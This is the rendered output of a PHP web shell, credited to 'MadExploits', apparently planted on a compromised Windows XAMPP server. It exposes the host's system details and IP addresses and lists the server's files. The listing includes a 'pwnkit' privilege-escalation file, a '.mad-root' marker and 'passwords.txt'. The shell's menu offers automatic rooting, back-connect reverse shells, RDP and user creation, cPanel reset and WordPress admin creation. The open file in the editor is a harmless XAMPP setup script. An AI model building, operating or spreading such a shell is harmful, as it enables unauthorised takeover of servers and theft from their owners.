Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.145.168.68
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
[ HOME SHELL ]
Name
Size
Permission
Action
FileZillaFTP
[ DIR ]
drwxrwxrwx
MercuryMail
[ DIR ]
drwxrwxrwx
anonymous
[ DIR ]
drwxrwxrwx
apache
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
contrib
[ DIR ]
drwxrwxrwx
htdocs
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
install
[ DIR ]
drwxrwxrwx
licenses
[ DIR ]
drwxrwxrwx
locale
[ DIR ]
drwxrwxrwx
mailoutput
[ DIR ]
drwxrwxrwx
mailtodisk
[ DIR ]
drwxrwxrwx
mysql
[ DIR ]
drwxrwxrwx
perl
[ DIR ]
drwxrwxrwx
php
[ DIR ]
drwxrwxrwx
phpMyAdmin
[ DIR ]
drwxrwxrwx
sendmail
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
tmp
[ DIR ]
drwxrwxrwx
tomcat
[ DIR ]
drwxrwxrwx
webalizer
[ DIR ]
drwxrwxrwx
webdav
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
apache_start.bat
436
B
-rwxrwxrwx
apache_stop.bat
190
B
-rwxrwxrwx
catalina_service.bat
10.08
KB
-rwxrwxrwx
catalina_start.bat
3.68
KB
-rwxrwxrwx
catalina_stop.bat
3.45
KB
-rwxrwxrwx
ctlscript.bat
2.67
KB
-rwxrwxrwx
filezilla_setup.bat
78
B
-rwxrwxrwx
filezilla_start.bat
150
B
-rwxrwxrwx
filezilla_stop.bat
149
B
-rwxrwxrwx
killprocess.bat
299
B
-rwxrwxrwx
mercury_start.bat
136
B
-rwxrwxrwx
mercury_stop.bat
60
B
-rwxrwxrwx
mysql_start.bat
471
B
-rwxrwxrwx
mysql_stop.bat
270
B
-rwxrwxrwx
passwords.txt
824
B
-rw-rw-rw-
properties.ini
792
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
readme_de.txt
7.32
KB
-rw-rw-rw-
readme_en.txt
7.2
KB
-rw-rw-rw-
service.exe
59.5
KB
-rwxrwxrwx
setup_xampp.bat
1.23
KB
-rwxrwxrwx
test_php.bat
1.63
KB
-rwxrwxrwx
uninstall.dat
257.84
KB
-rw-rw-rw-
uninstall.exe
6.28
MB
-rwxrwxrwx
xampp-control.exe
3.21
MB
-rwxrwxrwx
xampp-control.ini
173
B
-rw-rw-rw-
xampp_shell.bat
1.06
KB
-rwxrwxrwx
xampp_start.exe
116
KB
-rwxrwxrwx
xampp_stop.exe
116
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup_xampp.bat
@echo off echo ################################# START XAMPP TEST SECTION ################################# echo [XAMPP]: Test php.exe with php\php.exe -n -d output_buffering=0 --version ... php\php.exe -n -d output_buffering=0 --version if %ERRORLEVEL% GTR 0 ( echo: echo [ERROR]: Test php.exe failed !!! echo [ERROR]: Perhaps the Microsoft C++ 2008 runtime package is not installed. echo [ERROR]: Please try to install the MS VC++ 2008 Redistributable Package from the Mircrosoft page first echo [ERROR]: http://www.microsoft.com/en-us/download/details.aspx?id=5582 echo: echo ################################# END XAMPP TEST SECTION ################################### echo: pause exit 1 ) echo [XAMPP]: Test for the php.exe successfully passed. Good! echo ################################# END XAMPP TEST SECTION ################################### echo: if "%1" == "sfx" ( cd xampp ) if exist php\php.exe GOTO Normal if not exist php\php.exe GOTO Abort :Abort echo Sorry ... cannot find php cli! echo Must abort these process! pause GOTO END :Normal set PHP_BIN=php\php.exe set CONFIG_PHP=install\install.php %PHP_BIN% -n -d output_buffering=0 %CONFIG_PHP% GOTO END :END pause
Close